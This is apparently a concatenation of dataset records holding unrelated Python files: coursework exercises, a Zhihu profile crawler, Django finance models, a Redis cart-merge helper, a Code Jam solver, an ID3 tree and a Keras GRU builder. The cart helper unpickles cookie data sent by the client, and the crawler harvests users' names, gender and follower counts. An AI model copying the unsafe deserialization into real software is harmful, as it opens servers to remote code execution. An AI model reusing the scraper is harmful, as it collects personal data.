 fix13\")\nlog.write(\"SpeedTest13:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix14()\", setup=\"from __main__ import fix14\")\nlog.write(\"SpeedTest14:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix21()\", setup=\"from __main__ import fix21\")\nlog.write(\"SpeedTest21:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix22()\", setup=\"from __main__ import fix22\")\nlog.write(\"SpeedTest22:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix23()\", setup=\"from __main__ import fix23\")\nlog.write(\"SpeedTest23:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix24()\", setup=\"from __main__ import fix24\")\nlog.write(\"SpeedTest24:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix31()\", setup=\"from __main__ import fix31\")\nlog.write(\"SpeedTest31:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix32()\", setup=\"from __main__ import fix32\")\nlog.write(\"SpeedTest32:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix33()\", setup=\"from __main__ import fix33\")\nlog.write(\"SpeedTest33:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix34()\", setup=\"from __main__ import fix34\")\nlog.write(\"SpeedTest34:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\n\nresult = timeit.timeit(\"fix4()\", setup=\"from __main__ import fix4\")\nlog.write(\"SpeedTest4:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix5()\", setup=\"from __main__ import fix5\")\nlog.write(\"SpeedTest5:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\n\n# Ackermann function\n\n\ndef akker(a, b):\n    if a == 0:\n        return b + 1\n    if b == 0:\n        return akker(a - 1, 1)\n    return akker(a - 1, akker(a, b - 1))\n\n\n# Level 5\n\n\ndef enqueue(l, e):\n    l.append(e)\n\n\ndef dequeue(l):\n    if l:\n        return l.pop(0)\n\n\nif __name__ == \"__main__\":\n    x = []\n    assert dequeue(x) is None\n    assert enqueue(x, 1) is None\n    assert enqueue(x, 2) is None\n    assert dequeue(x) == 1\n    assert enqueue(x, 3) is None\n    assert dequeue(x) == 2\n    assert dequeue(x) == 3\n    assert dequeue(x) is None\n    assert x == []\n# Level 6\n\n\ndef enqueue(l, e, p):\n    # setdefault returns the list stored under priority p (creating it if\n    # missing), and the element e is appended to it\n    l.setdefault(p, []).append(e)\n\n\ndef dequeue(l):\n    # scan priorities from highest to lowest and pop from the first non-empty queue\n    for p in sorted(l, reverse=True):\n        q = l[p]\n        e = q.pop(0)\n        if not q:\n            del l[p]\n        return e
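\n\n\nif __name__ == \"__main__\":\n    # an added sanity check for the dict-based priority queue, mirroring the\n    # level-5 asserts above (a sketch, not part of the original homework):\n    # higher numeric priority is dequeued first\n    pq = {}\n    enqueue(pq, \"low\", 1)\n    enqueue(pq, \"high\", 5)\n    assert dequeue(pq) == \"high\"\n    assert dequeue(pq) == \"low\"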
\n","sub_path":"homeworks/pavel_titov/lesson03.py","file_name":"lesson03.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"267072216","text":"# -*- coding: utf-8 -*-\n\n_author_=\"ZengYancheng\"\nfrom bs4 import BeautifulSoup\nimport re\nimport basic\nimport time\n\ndef crawl_user(user_id):\n    person=basic.person_info()\n    person.id=user_id\n    try:\n        res = basic.session.get(basic.html_head+user_id+basic.followee, headers=basic.headers_base, cookies=basic.cookies)\n        soup=BeautifulSoup(res.text,\"html.parser\")\n    except:\n        basic.logfile.write(\"error while fetching the html or parsing the document\\n\")\n        exit(-1)\n    now=time.strftime('%d %H:%M:%S',time.localtime(time.time()))\n    basic.logfile.write(str(now)+\"\\tuser \"+user_id+\"\\t\"+str(res.status_code))\n    print (\"user:\"+user_id)\n\n    try:\n        person_info_div=soup.body.find(\"div\",role=\"main\").div.div\n        # determine gender\n        try:\n            gender_str=person_info_div.find(\"div\",class_=\"zm-profile-header ProfileCard\").div.find(\"div\",class_=\"body clearfix\").div.div.div.div.span.find(\"span\",class_=\"item gender\").i['class'][1]\n        except:\n            person.gender=3\n        else:\n            if(re.search(\"female\",gender_str)):\n                person.gender=2\n            elif(re.search(\"male\",gender_str)):\n                person.gender=1\n            else:\n                person.gender=-1\n\n        # get the user name\n        person_name_div=person_info_div.find(\"div\",class_=\"zm-profile-header ProfileCard\").find(\"div\",class_=\"zm-profile-header-main\").find(\"div\",class_=\"top\")\n        person.name=person_name_div.find(\"div\",class_=\"title-section ellipsis\").find(\"a\",class_=\"name\").contents[0]\n        # get upvote and thanks counts\n        person_info_gain_div=person_info_div.div.find(\"div\",class_=\"zm-profile-header-operation zg-clear \").div\n        person.agree=int(person_info_gain_div.span.find_next_sibling().strong.contents[0])\n        person.thanks=int(person_info_gain_div.span.find_next_sibling().find_next_sibling().strong.contents[0])\n\n        # get question, answer, article, favorite and public-edit counts\n        person_info_card_div=person_info_div.div.find(\"div\",class_=\"profile-navbar clearfix\")\n        current_a_tag=person_info_card_div.a.find_next_sibling()\n        person.questions=int(current_a_tag.span.contents[0])\n        current_a_tag=current_a_tag.find_next_sibling()\n        person.answers=int(current_a_tag.span.contents[0])\n        current_a_tag=current_a_tag.find_next_sibling()\n        person.articles=int(current_a_tag.span.contents[0])\n        current_a_tag=current_a_tag.find_next_sibling()\n        person.collect=int(current_a_tag.span.contents[0])\n        current_a_tag=current_a_tag.find_next_sibling()\n        person.pub_edit=int(current_a_tag.span.contents[0])\n\n        # get followee and follower counts\n        side_bar_div=soup.body.find(\"div\",role=\"main\").find(\"div\",class_=\"zu-main-sidebar\").div\n        person.followees=int(side_bar_div.a.strong.contents[0])\n        person.followers=int(side_bar_div.a.find_next_sibling().strong.contents[0])\n    # an exception occurred while extracting the profile info\n    except:\n        basic.logfile.write(\"\\terror \\n\")\n    else:\n        # save the data\n        basic.infofile.write(person.id+\"\\t\")\n        basic.infofile.write(person.name.encode('utf-8')+\"\\t\")\n        if(person.gender==1):\n            basic.infofile.write(\"男\\t\")  # male\n        elif (person.gender==2):\n            basic.infofile.write(\"女\\t\")  # female\n        elif(person.gender==3):\n            basic.infofile.write(\"未填写\\t\")  # not filled in\n        else:\n            basic.infofile.write(str(person.gender)+\" error\\t\")\n        basic.infofile.write(str(person.agree)+\"\\t\")\n        basic.infofile.write(str(person.thanks)+\"\\t\")\n        basic.infofile.write(str(person.questions)+\"\\t\")\n        basic.infofile.write(str(person.answers)+\"\\t\")\n        basic.infofile.write(str(person.articles)+\"\\t\")\n        basic.infofile.write(str(person.collect)+\"\\t\")\n        basic.infofile.write(str(person.pub_edit)+\"\\t\")\n        basic.infofile.write(str(person.followees)+\"\\t\")\n        basic.infofile.write(str(person.followers)+\"\\n\")\n        basic.logfile.write(\"\\tdata saved\\n\")\n    finally:\n        try:\n            # fetch the followee list and put new users into the queue\n            if(basic.queue.qsize()<350):\n                followee_list_div=person_info_div.find(\"div\",class_=\"zm-profile-section-wrap zm-profile-followee-page\").find(\"div\",class_=\"zm-profile-section-list\").div.div\n                current_followee=followee_list_div.div\n                count=0\n                while (current_followee is not None):\n                    href_str=current_followee.find(\"div\",class_=\"zm-list-content-medium\").h2.a['href']\n                    href_id=re.sub(\"https://www.zhihu.com/people/\",\"\",href_str)\n                    if((\"/\"+href_id+\"/\") not in basic.checked_id):\n                        count+=1\n                        basic.queue.put(href_id)\n                        basic.checked_id+=href_id+\"/\"\n                    current_followee=current_followee.find_next_sibling()\n                now=time.strftime('%d %H:%M:%S',time.localtime(time.time()))\n                basic.logfile.write(str(now)+\"\\t\"+str(count)+\" followees put into queue\\n\")\n        except:\n            pass\n","sub_path":"crawl_user.py","file_name":"crawl_user.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"577955192","text":"from django.db import models\n\n\nclass TransactionType(models.Model):\n    title = models.CharField(max_length= 60)\n\n    def __str__(self):\n        return self.title\n\n\nclass One(models.Model):\n    title = models.CharField(max_length= 60)\n    transaction_type = models.ForeignKey(TransactionType, on_delete= models.CASCADE)\n\n    def __str__(self):\n        return self.title\n\n\nclass Two(models.Model):\n    title = models.CharField(max_length= 60)\n    upper_category = models.ForeignKey(One, on_delete= models.CASCADE)\n\n    def __str__(self):\n        return self.title\n\n\nclass Three(models.Model):\n    title = models.CharField(max_length= 60)\n    upper_category = models.ForeignKey(Two, on_delete=models.CASCADE)\n\n    def __str__(self):\n        return self.title\n\n\nclass Four(models.Model):\n    title = models.CharField(max_length= 60)\n    upper_category = models.ForeignKey(Three, on_delete=models.CASCADE)\n\n    def __str__(self):\n        return self.title\n\n\nclass Currency(models.Model):\n    title = models.CharField(max_length= 60)\n\n    def __str__(self):\n        return self.title\n\n\nclass Bank(models.Model):\n    title = models.CharField(max_length=60)\n    isBank = models.BooleanField()\n    balance = models.IntegerField()\n    bank = models.ManyToManyField('self', related_name='receiver_banks', symmetrical=False)\n\n    def __str__(self):\n        return self.title\n\n\nclass Transaction(models.Model):\n    description = models.CharField(max_length=60)\n    amount = models.PositiveIntegerField()\n    currency = models.ForeignKey(Currency, on_delete=models.PROTECT)\n    datetime = models.DateTimeField(auto_now=False)\n    one = models.ForeignKey(One, on_delete=models.SET_NULL, null= True)\n    two = models.ForeignKey(Two, on_delete=models.SET_NULL, null=True)\n    three = models.ForeignKey(Three, on_delete=models.SET_NULL, null=True)\n    four = models.ForeignKey(Four, on_delete=models.SET_NULL, null=True)\n    transaction_method = models.CharField(max_length= 30, null= True)\n    transaction_type = models.ForeignKey(TransactionType, on_delete=models.SET_NULL, null= True)\n    bank = models.ForeignKey(Bank, on_delete= models.SET_NULL, null= True)\n    bank_from = models.ForeignKey(Bank, on_delete= models.SET_NULL, null= True, related_name='bank_from')\n    bank_to = models.ForeignKey(Bank, on_delete= models.SET_NULL, null= True, related_name='bank_to')\n\n    def __str__(self):\n        return self.description\n\n    def save(self, *args, **kwargs):\n        transaction = super(Transaction, self).save(*args, **kwargs)\n        # checks if transaction is an entry transaction\n        if str(getattr(self, 'transaction_type')) == \"Giriş\":\n            if getattr(self, 'transaction_method') == 'cash':\n                nakit_kasa = Bank.objects.get(pk=1)\n                current_balance = nakit_kasa.balance\n                nakit_kasa.balance = current_balance + getattr(self, 'amount')\n                nakit_kasa.save()\n            elif getattr(self, 'transaction_method') == 'bank':\n                print(getattr(self, 'bank'))\n                banka = Bank.objects.filter(title= getattr(self, 'bank')).first()\n                current_balance = banka.balance\n                banka.balance = current_balance + getattr(self, 'amount')\n                banka.save()\n        elif str(getattr(self, 'transaction_type')) == \"Çıkış\":\n            if getattr(self, 'transaction_method') == 'cash':\n                nakit_kasa = Bank.objects.get(pk=1)\n                current_balance = nakit_kasa.balance\n                nakit_kasa.balance =
 current_balance - getattr(self, 'amount')  # a cash outflow decreases the register balance, matching the bank branch below\n                nakit_kasa.save()\n            elif getattr(self, 'transaction_method') == 'bank':\n                print(getattr(self, 'bank'))\n                banka = Bank.objects.filter(title= getattr(self, 'bank')).first()\n                current_balance = banka.balance\n                banka.balance = current_balance - getattr(self, 'amount')\n                banka.save()\n        elif str(getattr(self, 'transaction_type')) == \"Virman\":\n            bank_from =Bank.objects.filter(title = getattr(self, 'bank_from')).first()\n            bank_to = Bank.objects.filter(title=getattr(self, 'bank_to')).first()\n            bank_from.balance = bank_from.balance - getattr(self, 'amount')\n            bank_to.balance = bank_to.balance + getattr(self, 'amount')\n            bank_from.save()\n            bank_to.save()\n\n        # add check and credit card functionality\n        return transaction\n\n","sub_path":"kasav4/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"525426211","text":"import base64\nimport pickle\n\nfrom django_redis import get_redis_connection\n\n\ndef merge_cookie_to_redis(request,user,response):\n\n    \"\"\"\n    1. Get the cart data from the cookie\n    2. Read the cart data already in redis;\n       initialize a dict for the counts,\n       one list for the selected sku ids,\n       one list for the unselected sku ids\n    3. Iterate over the cookie cart data\n    4. Write the merged data back to redis\n    5. Delete the cookie\n    \"\"\"\n    carts_str = request.COOKIES.get('carts')\n\n    if carts_str is not None:\n        carts_dict = pickle.loads(base64.b64decode(carts_str))\n\n    else:\n        return response\n\n    redis_conn = get_redis_connection('carts')\n\n    id_count_bytes = redis_conn.hgetall('carts_%s' % user.id)\n    selected_ids = redis_conn.smembers('selected_%s' % user.id)\n\n    dict1 = {}\n\n    list1 = []\n\n    list2 = []\n\n    for sku_id,count in id_count_bytes.items():\n        dict1[int(sku_id)] = int(count)\n    for sku_id, count_selected_dict in carts_dict.items():\n\n        # the cookie value wins over the redis count\n        dict1[sku_id] = count_selected_dict['count']\n        if count_selected_dict['selected']:\n            list1.append(sku_id)\n        else:\n            list2.append(sku_id)\n    redis_conn.hmset('carts_%s'%user.id,dict1)\n    if len(list1)>0:\n        redis_conn.sadd('selected_%s'%user.id,*list1)\n    if len(list2)>0:\n        # unselected ids must be removed from the selected set, not added to it\n        redis_conn.srem('selected_%s' % user.id, *list2)\n\n    response.delete_cookie('carts')\n\n    return response\n\n","sub_path":"meiduo_mall/apps/carts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"275734514","text":"# https://code.google.com/codejam/contest/6254486/dashboard#s=p2\nimport pickle\nimport fileinput\nfrom functools import lru_cache\n\n\ndef rwh_primes(n):\n    # http://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\n    \"\"\" Returns a list of primes < n \"\"\"\n    sieve = [True] * n\n    for i in range(3,int(n**0.5)+1,2):\n        if sieve[i]:\n            sieve[i*i::2*i]=[False]*((n-i*i-1)//(2*i)+1)\n    return set([2] + [i for i in range(3,n,2) if sieve[i]])\n\n\ndef get_digits(n):\n    result = list()\n    while n:\n        result.append(n % 10)\n        n //= 10\n    return result\n\n\ndef interpret_in_base(n, base):\n    return sum([base ** i * d for i, d in enumerate(get_digits(n))])\n\n\ndef generate_num(n, length):\n    return int('1' + '{0:b}'.format(n).zfill(length - 2) + '1')\n\n\n@lru_cache(maxsize=None)\ndef is_prime(n):\n    for i in range(2, int(n**0.5)+1):\n        if n % i == 0:\n            return False\n    return True\n\n\ndef is_jamcoin(n, primes):\n    result = True\n    for base in range(2, 11):\n        x = 
interpret_in_base(n, base)\n result = result and not x in primes\n return result\n\n\ndef is_jamcoin(n):\n result = True\n for base in range(2, 11):\n x = interpret_in_base(n, base)\n result = result and not is_prime(x)\n return result\n\n\ndef find_divisor(n):\n for y in range(2, n):\n if n % y == 0:\n return y\n return None\n\n\ndef build_divisors(n, primes):\n result = {1: None}\n for i in range(2, n+1):\n if i in primes:\n result[i] = None\n else:\n result[i] = find_divisor(i)\n return result\n\n\ndef get_divisors(n, primes):\n result = list()\n for base in range(2, 11):\n x = interpret_in_base(n, base)\n result.append(primes[x])\n return result\n\n\n@lru_cache(maxsize=None)\ndef get_divisors(n):\n result = list()\n for base in range(2, 11):\n x = interpret_in_base(n, base)\n result.append(find_divisor(x))\n return result\n\n\ndef main():\n f = fileinput.input()\n T = int(f.readline())\n assert (T == 1)\n print(\"Case #1:\")\n N, J = (int(s.strip()) for s in f.readline().split())\n MAX = 10 ** N\n \"\"\"\n try:\n primes = pickle.load(open(\"primes.pickle\", \"rb\"))\n divisors = pickle.load(open(\"divisors.pickle\", \"rb\"))\n except (OSError, IOError) as e:\n primes = rwh_primes(MAX)\n divisors = build_divisors(MAX, primes)\n pickle.dump(primes, open(\"primes.pickle\", \"wb\"))\n pickle.dump(divisors, open(\"divisors.pickle\", \"wb\"))\n \"\"\"\n nums = (generate_num(i, N) for i in range(MAX))\n cnt = 0\n for i, num in enumerate(nums):\n if is_jamcoin(num):\n print(\" \".join(map(str, [num] + get_divisors(num))))\n cnt += 1\n if cnt >= J:\n break\n\nif __name__ == '__main__':\n main()\n","sub_path":"codes/CodeJamCrawler/16_0_3_neat/16_0_3_bpgergo_coin_jam.py","file_name":"16_0_3_bpgergo_coin_jam.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"59066016","text":"def dictComp(stop, step):\n dict_list = {}\n count = 0\n\n\n array_list = [ array for array in range(1, stop+1) ]\n \n for digit in array_list:\n # Condition runs only on the first iteration when dict_list has no key value pair\n if len(dict_list) == 0:\n count += 1\n dict_list[\"items-{}\".format(count)] = [digit]\n\n # Condition when each value as a list is not greater than step \n elif len(dict_list[\"items-{}\".format(count)]) < step :\n dict_list[\"items-{}\".format(count)].append(digit)\n \n # Condition for creating new key value pair after the lenth of last pair is equal to step\n else:\n count += 1\n dict_list[\"items-{}\".format(count )] = [digit]\n\n if len(dict_list[\"items-{}\".format(count)]) < step:\n dict_list.popitem()\n\n print(dict_list)\n\n\ntry:\n stop = int(input(\"Enter a number as the stop limit for your array/list: \"))\n step = int(input(\"Enter the digit to use as a step: \"))\n print(\"\\n\")\n\n dictComp(stop, step)\n\nexcept ValueError:\n print(\"\\n\")\n print(\"Invalid input, please enter only a number\")\n print(\"\\n\")\n stop = int(input(\"Enter a number as the stop limit for your array/list: \"))\n step = int(input(\"Enter the digit to use as a step: \"))\n print(\"\\n\")\n\n dictComp(stop, step)\n","sub_path":"src/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"96632460","text":"import pandas as pd\nimport numpy as np\nimport pandas.api.types as pd_types\n\ndef pd_summary(df):\n # sample a maximum of 100k rows randomly\n if len(df) > 100000:\n df = 
df.sample(100000)\n\n # dtypes\n stats = {}\n for col in df.columns:\n if pd_types.is_object_dtype(df[col]) or pd_types.is_categorical_dtype(df[col]):\n stats[col] = df[col].value_counts()\n stats[col][np.nan] = df[col].isna().sum() \n\n elif pd_types.is_numeric_dtype(df[col]):\n stats[col] = df[col].quantile([0, 0.25, 0.5, 0.75, 1])\n stats[col].index = ['0%','25%', '50%', '75%', '100%']\n stats[col]['mean'] = df[col].mean()\n stats[col][np.nan] = df[col].isna().sum()\n stats[col] = stats[col][['0%', '25%', '50%', 'mean', '75%', '100%', np.nan]]\n else:\n stats[col] = None\n\n print(\"----- {} -----\".format(col))\n print(stats[col])\n print(\"\\n\")\n\n \n\n","sub_path":"lib/pandas_util.py","file_name":"pandas_util.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"196065138","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.externals import joblib\n\ndef load_dataframe():\n\t# Load heart disease dataset into pandas dataframe\n\tpathHeart = \"../../FYP_Data/heart-disease-uci/\"\n\theart = pd.read_csv(pathHeart + 'new_cleveland.csv')\n\theart = heart.drop(['dm'], axis=1)\n\n\treturn heart\n\ndef bin_values(heart):\n\tcolumns_to_bin = ['age', 'trestbps', 'trestbpd', 'chol', 'cigs', 'years', 'thalrest']\n\n\tfor col in columns_to_bin:\n\t\t# Chol requires more buckets\n\t\tif col == 'chol':\n\t\t\theart[col] = pd.cut(heart[col], 10)\n\t\telse:\n\t\t\theart[col] = pd.cut(heart[col], 7)\n\t\n\t# heart = pd.get_dummies(heart, columns = columns_to_bin)\n\n\treturn heart, columns_to_bin\n\ndef get_target_entropy(heart):\n\tentropy = 0\n\n\t# Possible values are they have heart disease or they don't (1 or 0 respectively)\n\tvalues = heart['target'].unique()\n\n\t# Calculate entropy\n\tfor value in values:\n\t\tval_split = heart['target'].value_counts()[value]/len(heart['target'])\n\t\tentropy = entropy + -val_split*np.log2(val_split)\n\n\treturn entropy\n\ndef get_feature_entropy(heart, feature):\n\tfeature_entropy = 0\n\n\t# To prevent the feature entropies from being null\n\tsmallest_num = np.finfo(float).tiny\n\n\t# Get the unique values for the target and the feature\n\tvalues = heart['target'].unique()\n\tfeature_vals = heart[feature].unique()\n\n\tfor value in feature_vals:\n\t\tval_entropy = 0\n\t\tfor val in values:\n\t\t\t# Get the number of possible values within the feature\n\t\t\tnum_of_each_val = heart[feature][heart[feature]==value]\n\t\t\t\n\t\t\t# For getting the ratio\n\t\t\tnumerator = len(num_of_each_val[heart['target']==val])\n\t\t\tdenominator = len(num_of_each_val)\n\t\t\t\n\t\t\t# Add the smallest number so its not dividing by 0\n\t\t\tval_split = numerator/(denominator+smallest_num)\n\t\t\t\n\t\t\t\"\"\" Get the entropy for both target feature \n\t\t\t\tvalues with respect to this feature value\n\t\t\t\"\"\"\n\t\t\t# Add the smallest number so its not log2(0)\n\t\t\tval_entropy = val_entropy + -val_split*np.log2(val_split+smallest_num)\n\n\t\t# Get the entropy for all values in this feature\n\t\tval_ratio = denominator/len(heart)\n\t\tfeature_entropy = feature_entropy + val_ratio*val_entropy\n\t\n\treturn feature_entropy\n\ndef calc_info_gains(heart, info_gains):\n\t# Calculate the info_gain for non-target features only\n\tfeatures = heart.drop(['target'], axis=1)\n\n\t# Get entropy of target feature\n\ttarget_entropy = get_target_entropy(heart)\n\n\tfor f in features:\n\t\tfeature_entropy = get_feature_entropy(heart, f)\n\t\tinformation_gain = target_entropy - 
 feature_entropy\n\t\tinfo_gains[f] = information_gain\n\n\treturn info_gains\n\ndef find_feature(heart, info_gains):\n\tinfo_gains = calc_info_gains(heart, info_gains)\n\n\tvals = list(info_gains.values())\n\tfeat = list(info_gains.keys())\n\n\treturn feat[vals.index(max(vals))]\n\ndef create_tree(heart, dec_tree = 0):\n\t# Find the feature to split on i.e. the node feature\n\tinfo_gains = {}\n\tnode_feature = find_feature(heart, info_gains)\n\tnode_feat_vals = heart[node_feature]\n\n\t# Initialise decision tree\n\tif dec_tree == 0:\n\t\tdec_tree = {}\n\t\tdec_tree[node_feature] = {}\n\n\t# Get all values for the node\n\tall_node_vals = np.unique(node_feat_vals)\n\tprint(node_feature)\n\t# Build the tree with recursion\n\tfor val in all_node_vals:\n\t\tsub_tree = heart[node_feat_vals == val].reset_index(drop=True)\n\n\t\tvalues, size = np.unique(sub_tree['target'], return_counts=True)\n\t\tprint(val)\n\t\tprint(values)\n\t\tprint(size)\n\t\t# More of the tree needs to be built\n\t\tif len(size) > 1:\n\t\t\tprint(dec_tree[node_feature])\n\t\t\tprint(\"Making recursive call\\n\\n\\n\")\n\t\t\twithout_target = sub_tree.drop(['target'], axis=1)\n\t\t\tno_duplicates = without_target.drop_duplicates(without_target.columns)\n\t\t\t\n\t\t\t# if node_feature == 'Short_Breath':\n\t\t\tif len(no_duplicates) == 1:\n\t\t\t\tprint(\"THEY'RE EQUAL\\n\\n\\n\")\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprint(\"Making recursive call\\n\\n\\n\")\n\t\t\t\tdec_tree[node_feature][val] = create_tree(sub_tree) \n\t\t\n\t\t# This is the leaf node\n\t\telse:\n\t\t\tdec_tree[node_feature][val] = values[0]\n\t\t\t\n\treturn dec_tree\n\n\ndef make_prediction(new_data, decision_tree):\n\t# Start at the root node\n\troot = list(decision_tree.keys())\n\n\t# Loop through all possible sub nodes\n\tfor sub_node in root:\n\t\t\n\t\t# Getting the value of the root node for the new data point\n\t\tval = new_data[sub_node]\n\t\t\n\t\t# Getting the subtree at that value\n\t\tdecision_tree = decision_tree[sub_node][val]\n\t\tpred = 0\n\n\t\t# If the subtree has its own subtree then make the recursive call\n\t\tif isinstance(decision_tree, dict):\n\t\t\tpred = make_prediction(new_data, decision_tree)\n\t\t\n\t\t# The subtree just contains the prediction\n\t\telse:\n\t\t\tpred = decision_tree\n\n\treturn pred\n\n\ndef main():\n\t# Load dataset\n\theart = load_dataframe()\n\tdata = np.array([21,1,1,131,87,205,5,4,0,0,75,0])\n\tinstance = pd.Series(data, index=['age','sex','cp','trestbps','trestbpd',\n\t\t\t\t\t\t\t\t\t'chol','cigs','years','fbs','famhist','thalrest',\n\t\t\t\t\t\t\t\t\t'exang'])\n\n\tprint(instance)\n\n\t# heart = heart.append(instance, ignore_index=True)\n\n\t# Bin features\n\theart, columns_to_bin = bin_values(heart)\n\tcolumns_to_bin = ['age', 'trestbps', 'trestbpd', 'chol', 'cigs', 'years', 'thalrest']\n\n\t# print(heart.tail())\n\n\t# instance = heart.drop(['target'], axis=1).iloc[-1]\n\t# heart = heart.drop(heart.index[-1])\n\n\n\t# Build tree\n\tdecision_tree = create_tree(heart)\n\tjoblib.dump(decision_tree, 'heart_dt_hascp.pkl')\n\t# print(heart.iloc[4])\n\n\t# new_data = heart.drop(['target'], axis=1).iloc[4]\n\n\t# Make predictions\n\t# pred = make_prediction(instance, decision_tree)\n\n\t# print(pred)\n\nmain()
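\n\n# Worked example of the information-gain math above (an added note):\n# a 50/50 target split has entropy -0.5*np.log2(0.5) - 0.5*np.log2(0.5) = 1.0 bit;\n# a feature whose values split the target perfectly has feature entropy 0,\n# so its information gain is the full 1.0.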
","sub_path":"id3.py","file_name":"id3.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"468510721","text":"\"\"\"Creates Gated Recurrent Unit (GRU) model.\"\"\"\n\nimport tensorflow as tf\n\n\ndef GRU(\n    input_shape,\n    output_size,\n    loss,\n    optimizer,\n    recurrent_units=[64],\n    recurrent_dropout=0,\n    return_sequences=False,\n    dense_layers=[],\n    dense_dropout=0,\n    out_activation=\"linear\",\n):\n    \"\"\"Gated Recurrent Unit (GRU).\n\n    Args:\n        input_shape (tuple): Shape of the input data\n        output_size (int): Number of neurons of the last layer.\n        loss (tf.keras.Loss): Loss to be used for training.\n        optimizer (tf.keras.Optimizer): Optimizer that implements the training algorithm.\n        recurrent_units (list, optional): Number of recurrent units for each GRU layer.\n            Defaults to [64].\n        recurrent_dropout (float between 0 and 1, optional): Fraction of the input units to drop.\n            Defaults to 0.\n        return_sequences (bool, optional): Whether to return the last output in the output sequence, or the full sequence.\n            Defaults to False.\n        dense_layers (list, optional): List with the number of hidden neurons for each\n            layer of the dense block before the output.\n            Defaults to [].\n        dense_dropout (float between 0 and 1, optional): Fraction of the dense units to drop.\n            Defaults to 0.0.\n        out_activation (tf activation function, optional): Activation of the output layer.\n            Defaults to \"linear\".\n\n    Returns:\n        tf.keras.Model: GRU model\n    \"\"\"\n    input_shape = input_shape[-len(input_shape) + 1 :]  # drop the leading (batch) dimension\n    inputs = tf.keras.layers.Input(shape=input_shape)\n\n    x = inputs\n    if len(input_shape) < 2:\n        x = tf.keras.layers.Reshape((inputs.shape[1], 1))(x)\n\n    # GRU layers\n    for i, u in enumerate(recurrent_units):\n        return_sequences_tmp = (\n            return_sequences if i == len(recurrent_units) - 1 else True\n        )\n        x = tf.keras.layers.GRU(\n            u, return_sequences=return_sequences_tmp, dropout=recurrent_dropout\n        )(x)\n\n    # Dense layers\n    if return_sequences:\n        x = tf.keras.layers.Flatten()(x)\n    for hidden_units in dense_layers:\n        x = tf.keras.layers.Dense(hidden_units)(x)\n        if dense_dropout > 0:\n            x = tf.keras.layers.Dropout(dense_dropout)(x)\n    x = tf.keras.layers.Dense(output_size, activation=out_activation)(x)\n\n    model = tf.keras.Model(inputs=inputs, outputs=x)\n    model.compile(optimizer=optimizer, loss=loss)\n\n    return model
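\n\n\n# Example usage (an added sketch; shapes and hyperparameters are illustrative only):\n#   model = GRU(input_shape=(None, 24, 1), output_size=1, loss=\"mae\",\n#               optimizer=\"adam\", recurrent_units=[64, 32], dense_layers=[16])\n#   model.summary()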
\n","sub_path":"ADLStream/models/gru.py","file_name":"gru.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"633911595","text":"class Solution(object):\n    def largestRectangleArea(self, heights):\n        \"\"\"\n        :type heights: List[int]\n        :rtype: int\n        \"\"\"\n        # monotonic stack of indices; bar heights are strictly increasing on the stack\n        max_area = 0\n        dp = []\n        dp.append(-1)  # sentinel marking the left boundary\n        length = len(heights)\n        for i in range(length):\n            # pop every bar at least as tall as heights[i]; it cannot extend past i\n            while(dp[len(dp) - 1] != -1 and heights[dp[len(dp) - 1]] >= heights[i]):\n                max_area = max(max_area, heights[dp.pop()] * (i - dp[len(dp) - 1] -1)) \n            dp.append(i)\n        # remaining bars extend to the right edge of the histogram\n        while(dp[len(dp) - 1] != -1):\n            max_area = max(max_area, heights[dp.pop()] * (length - dp[len(dp) - 1] - 1))\n        return max_area\n    ","sub_path":"84.Largest Rectangle in Histogram.py","file_name":"84.Largest Rectangle in Histogram.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
